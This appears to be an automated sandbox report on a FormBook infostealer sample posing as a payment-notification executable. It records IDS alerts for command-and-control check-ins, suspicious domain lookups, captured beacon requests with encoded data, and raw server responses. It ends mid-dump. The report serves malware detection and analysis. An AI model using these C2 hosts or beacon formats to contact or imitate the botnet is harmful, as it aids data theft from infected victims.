Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 103.174.136.137:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50020 -> 104.21.18.171:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50020 -> 104.21.18.171:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 38.22.89.164:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 45.130.41.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 38.22.89.164:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50044 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50044 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 103.174.136.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49957 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 104.21.18.171:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 104.21.18.171:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50010 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50010 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 103.174.136.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50048 -> 103.174.136.137:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50048 -> 103.174.136.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 199.59.243.228:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.sesanu.xyz
Source:	DNS query: www.tabyscooterrentals.xyz

Source: Joe Sandbox View	IP Address: 104.21.18.171 104.21.18.171
Source: Joe Sandbox View	IP Address: 199.192.21.169 199.192.21.169

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0095CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0095CE44

Source: global traffic	HTTP traffic detected: GET /ajra/?idTDev6P=2p4airO795Dn7gjI0Dv91awJZZT6XeJxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt2IUp0UaNuBDF/7fv0VCCEc7XsfSWpnh1zI=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.zucchini.proConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /q1v9/?idTDev6P=metx3mUju98G7hAYbLi4XsmUgHwdedXXJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7T3N/CIVyK6RIDDiNH4cRPg0hdY8uXiShr8=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.ogbos88.cyouConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /u8xw/?z2=LHT8eHbp3J&idTDev6P=i8gXCJLEz0m1jkVC3VXAcNUKqrLt4taQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL87/iV5cEHcZkG+VUFy3lql/kPGuEhgf21E= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.esscosaathi.infoConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /y3ui/?idTDev6P=D47F9HanQoviz063Kla+uXJoUZ9Xkn5EFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexR6UeFArqVG6bzfyBJ63IAhlWCOyYqCEOzA=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.myfastuploader.sbsConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /mjs1/?z2=LHT8eHbp3J&idTDev6P=GVh/hhHQVOm9lJhlnTwGtMkA4ymI5xMQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4xM/x/d5q69NU5cNgbKFIutrK5EtJTwwV9w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /rf25/?idTDev6P=7K/WA23tcmDFyzNLMn/EpU9MVXFD0cPmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1i5W2RZanfRuX6/plfhQnf3YS6vnQQobeR4=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sesanu.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /vwha/?z2=LHT8eHbp3J&idTDev6P=+1TlPe1iHurJgrUv/lhWkNYBQhwaVohjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEgG9LzsexELnrvNTZ6WsCe6wz+oUbTnhz6U= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sovz.proConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /l5cx/?idTDev6P=yQJKkfxWdg40vhwN6z0cv3Re74y0hoes8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQZ1Tpj+VkeU09FX8TcyzM38BEJG/9zYR/HY=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.tabyscooterrentals.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /gott/?z2=LHT8eHbp3J&idTDev6P=6kpJ6LpNwGTQjQFo3QTaoLrj/KP09pa+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhrL8LPD7Y+8AZWFZ/qadVKHEgd+qnz3Eias= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sql.danceConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /ucix/?idTDev6P=PvAg9QCS6Z5JTHKbpS7nTnQEYV78sBmDdvenPAgfZzfjFvd/bCKGmpWiozs7PE3CLHF555uBY/gZrXu5AFygOIQKoTuDn9aElepw412NEgoxxpo789p/RNg=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.811371bb10.buzzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /csd1/?z2=LHT8eHbp3J&idTDev6P=0h3WwWevRNaqBPz/dW1li3QIq8Phv/5H4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57VjJjxQ++03TYD8RIhl0tg+o7+6xEQ/Px7iI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.rtp189z.latConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /8m3y/?idTDev6P=+b9jpUpgOBw1R1sbmQNUSLWfWziv1WHHOphGnZ74l6djh+VypXV/SxbEO3x3Zf/CAjSFfUkl5YWJ6O7zhki1CEr+PCryGvo+//4gSAtBEtsQDlqalgX6+sA=&z2=LHT8eHbp3J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.u75lmwdgp0du.homesConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)

Source: global traffic	DNS traffic detected: DNS query: www.biocaracol.online
Source: global traffic	DNS traffic detected: DNS query: www.zucchini.pro
Source: global traffic	DNS traffic detected: DNS query: www.yacolca.digital
Source: global traffic	DNS traffic detected: DNS query: www.ogbos88.cyou
Source: global traffic	DNS traffic detected: DNS query: www.esscosaathi.info
Source: global traffic	DNS traffic detected: DNS query: www.myfastuploader.sbs
Source: global traffic	DNS traffic detected: DNS query: www.grimbo.boats
Source: global traffic	DNS traffic detected: DNS query: www.sesanu.xyz
Source: global traffic	DNS traffic detected: DNS query: www.sovz.pro
Source: global traffic	DNS traffic detected: DNS query: www.tabyscooterrentals.xyz
Source: global traffic	DNS traffic detected: DNS query: www.sql.dance
Source: global traffic	DNS traffic detected: DNS query: www.811371bb10.buzz
Source: global traffic	DNS traffic detected: DNS query: www.rtp189z.lat
Source: global traffic	DNS traffic detected: DNS query: www.glyttera.shop
Source: global traffic	DNS traffic detected: DNS query: www.usps-infora.top
Source: global traffic	DNS traffic detected: DNS query: www.u75lmwdgp0du.homes

Source: unknown

HTTP traffic detected: POST /q1v9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.ogbos88.cyouOrigin: http://www.ogbos88.cyouReferer: http://www.ogbos88.cyou/q1v9/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 205Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)Data Raw: 69 64 54 44 65 76 36 50 3d 72 63 46 52 30 53 63 72 71 50 68 2f 77 54 38 73 65 49 7a 49 58 39 32 61 6d 6d 45 31 54 4d 43 79 4b 6d 31 6c 33 4c 46 6e 5a 68 33 62 59 4e 58 2f 6a 69 56 32 62 4b 6f 70 73 54 79 70 71 38 43 58 65 65 48 36 5a 6e 43 41 44 4c 35 44 48 75 58 77 71 77 4f 38 33 32 4c 70 79 67 59 4f 6f 49 32 6f 41 57 50 6a 4e 41 55 6f 63 50 55 61 6c 50 38 36 6a 58 69 79 6d 37 32 77 7a 30 72 74 75 6d 48 5a 65 47 47 6a 55 79 56 6c 6f 58 39 64 55 48 69 4c 7a 41 6b 5a 59 6b 56 33 32 55 52 41 43 41 77 72 72 4b 50 67 58 6a 79 78 6c 76 4a 58 65 2f 68 50 2b 66 77 4c 5a 44 78 6c 7a 2b 33 4b 73 7a 73 34 35 51 3d 3d Data Ascii: idTDev6P=rcFR0ScrqPh/wT8seIzIX92ammE1TMCyKm1l3LFnZh3bYNX/jiV2bKopsTypq8CXeeH6ZnCADL5DHuXwqwO832LpygYOoI2oAWPjNAUocPUalP86jXiym72wz0rtumHZeGGjUyVloX9dUHiLzAkZYkV32URACAwrrKPgXjyxlvJXe/hP+fwLZDxlz+3Kszs45Q==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:36 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qaLspminxDITApjpX%2F7FjrDf5bDfL7USOzvER0IpMma6CzvMNXwKVocNYucN8uqc4MWx6NuATd3NVUU%2BHjLdDIwX48%2BzG%2B%2Fpk5l%2B7nrDkW1YSrg2xSbzmkIgbiY%2FCWOGDxK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90144fb59f395e62-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=732&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jc7qfFfZ7I3FRias3CFKpfZZp1SY8PwblZQ%2BjN627zoAqxQjA15%2F0o3U8WWrCiqhsYoqMxu7r88CJ4GwW3QyOOlbNO42TjHFpKY1PA%2FiEubEAiFjh%2FFIIN98f0HnP25Zr%2FDE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90144fc5a98e432c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1676&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=752&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qKCMPbw1omOcB84Tpt9%2BK242kenX68YxcKBKe%2B3VcggY1ULWDYxIGueMrvJNsawQ1TJ5rYIqsRGVtPgjJjSd%2Fwwy7YYoYau0wU63SEhzOfdMhboa9KleSHSDOyVZzhZTYv%2BN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90144fd58ee18c5f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1940&min_rtt=1940&rtt_var=970&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10834&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:44 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzI32YBuEIg8J1ALTg3gm%2BAJHCXDPJgNTBKHKv4kLbAqD%2FU9tTbi1Bn0k5kBZusOSD%2F6cDuYl1IlJm7%2BY0r6OZHylCHyOv8jmHFuU87KbdKbY1escpq4hTKNbcvDXmIWR5Nq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90144fe58aac4319-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=466&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:20:50 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 